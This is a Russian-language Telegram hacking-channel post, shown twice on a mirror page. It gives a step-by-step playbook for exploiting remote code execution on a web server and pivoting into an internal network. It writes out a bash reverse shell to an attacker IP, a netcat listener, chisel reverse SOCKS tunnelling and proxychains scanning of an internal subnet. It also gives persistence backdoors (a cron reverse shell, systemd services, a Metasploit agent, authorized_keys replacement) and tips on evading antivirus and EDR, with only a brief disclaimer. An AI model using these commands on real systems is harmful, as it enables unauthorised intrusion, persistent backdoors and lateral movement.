Telegram Group & Telegram Channel
Как получить доступ к внутренней сети через уязвимый веб-сервер

Пошаговая инструкция эксплуатации уязвимости RCE с пивотингом во внутреннюю инфраструктуру.

1️⃣ Сканируем на наличие RCE

➡️ Используем nmap с NSE-скриптами:

nmap -p 80,443 --script http-vuln* <target_ip>

➡️ Проводим ручной fuzzing параметров через:

— ffuf / wfuzz
— Burp Suite Repeater
— curl с параметрами вида:

curl "http://target.com/test.php?cmd=id"

⚠️ Многие RCE не обнаруживаются автоматикой — критично вручную проверить подозрительные поля на injection, command chaining (&&, |, ;), base64.

2️⃣ Эксплуатируем уязвимость

Если выполнение подтверждено (например, id, uname -a), готовим обратную оболочку.

➡️ Используем наиболее совместимый вариант — bash или nc:

# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'


➡️ Варианты на случай отсутствия bash:

python3 -c 'import socket,os,...'
php -r '...reverse shell...'
perl, nc -e, curl | sh — в зависимости от окружения


3️⃣ Получаем доступ и готовим туннель

➡️ Слушаем на своей машине:

nc -lvnp 4444

➡️ Получив оболочку, загружаем туннелирование-инструмент:

Например, chisel:

# На атакующей машине
chisel server -p 8000 --reverse


# На целевой (из полученной shell)
./chisel client <attacker_ip>:8000 R:1080:socks

⚠️ Компилируй chisel под ОС и архитектуру цели (GOOS=linux GOARCH=amd64 или windows/386 и т.д.)

4️⃣ Пивотинг во внутреннюю сеть

➡️ Используем proxychains:

Настрой файл /etc/proxychains.conf на:

socks5 127.0.0.1 1080

➡️ Проверяем доступность внутренних хостов:

proxychains nmap -sT -Pn -p 80,443 10.0.0.0/24

⚠️ Только TCP, только -sT. Для UDP/ICMP — использовать socat или meterpreter route.

5️⃣ Укрепляем доступ

➡️ Ставим бекдор для повторного входа:

- cronjob: * * * * * bash -i >& /dev/tcp/<ip>/4444 0>&1

- systemd: .service с автозапуском

- загрузка агента Metasploit

- использование ssh-keygen и подмена .ssh/authorized_keys

🧠 Примечания:

• Проверяй антивирусы, EDR, IDS — chisel, meterpreter, nc часто палятся.
• Под каждую цель адаптируй инструменты: Windows = PowerShell и plink; Linux = socat, bash.

⚠️ Disclaimer:

Все действия описаны исключительно в образовательных целях. Проведение описанных операций без разрешения владельца системы является нарушением закона.

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM



tg-me.com/hackproglib/4116
Create:
Last Update:

Как получить доступ к внутренней сети через уязвимый веб-сервер

Пошаговая инструкция эксплуатации уязвимости RCE с пивотингом во внутреннюю инфраструктуру.

1️⃣ Сканируем на наличие RCE

➡️ Используем nmap с NSE-скриптами:

nmap -p 80,443 --script http-vuln* <target_ip>

➡️ Проводим ручной fuzzing параметров через:

— ffuf / wfuzz
— Burp Suite Repeater
— curl с параметрами вида:

curl "http://target.com/test.php?cmd=id"

⚠️ Многие RCE не обнаруживаются автоматикой — критично вручную проверить подозрительные поля на injection, command chaining (&&, |, ;), base64.

2️⃣ Эксплуатируем уязвимость

Если выполнение подтверждено (например, id, uname -a), готовим обратную оболочку.

➡️ Используем наиболее совместимый вариант — bash или nc:

# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'


➡️ Варианты на случай отсутствия bash:

python3 -c 'import socket,os,...'
php -r '...reverse shell...'
perl, nc -e, curl | sh — в зависимости от окружения


3️⃣ Получаем доступ и готовим туннель

➡️ Слушаем на своей машине:

nc -lvnp 4444

➡️ Получив оболочку, загружаем туннелирование-инструмент:

Например, chisel:

# На атакующей машине
chisel server -p 8000 --reverse


# На целевой (из полученной shell)
./chisel client <attacker_ip>:8000 R:1080:socks

⚠️ Компилируй chisel под ОС и архитектуру цели (GOOS=linux GOARCH=amd64 или windows/386 и т.д.)

4️⃣ Пивотинг во внутреннюю сеть

➡️ Используем proxychains:

Настрой файл /etc/proxychains.conf на:

socks5 127.0.0.1 1080

➡️ Проверяем доступность внутренних хостов:

proxychains nmap -sT -Pn -p 80,443 10.0.0.0/24

⚠️ Только TCP, только -sT. Для UDP/ICMP — использовать socat или meterpreter route.

5️⃣ Укрепляем доступ

➡️ Ставим бекдор для повторного входа:

- cronjob: * * * * * bash -i >& /dev/tcp/<ip>/4444 0>&1

- systemd: .service с автозапуском

- загрузка агента Metasploit

- использование ssh-keygen и подмена .ssh/authorized_keys

🧠 Примечания:

• Проверяй антивирусы, EDR, IDS — chisel, meterpreter, nc часто палятся.
• Под каждую цель адаптируй инструменты: Windows = PowerShell и plink; Linux = socat, bash.

⚠️ Disclaimer:

Все действия описаны исключительно в образовательных целях. Проведение описанных операций без разрешения владельца системы является нарушением закона.

🐸 Библиотека хакера

#буст

BY Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность




Share with your friend now:
tg-me.com/hackproglib/4116

View MORE
Open in Telegram


Библиотека хакера | Hacking Infosec ИБ информационная безопасность Telegram | DID YOU KNOW?

Date: |

What is Secret Chats of Telegram

Secret Chats are one of the service’s additional security features; it allows messages to be sent with client-to-client encryption. This setup means that, unlike regular messages, these secret messages can only be accessed from the device’s that initiated and accepted the chat. Additionally, Telegram notes that secret chats leave no trace on the company’s services and offer a self-destruct timer.

Telegram announces Search Filters

With the help of the Search Filters option, users can now filter search results by type. They can do that by using the new tabs: Media, Links, Files and others. Searches can be done based on the particular time period like by typing in the date or even “Yesterday”. If users type in the name of a person, group, channel or bot, an extra filter will be applied to the searches.

Библиотека хакера | Hacking Infosec ИБ информационная безопасность from us


Telegram Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
FROM USA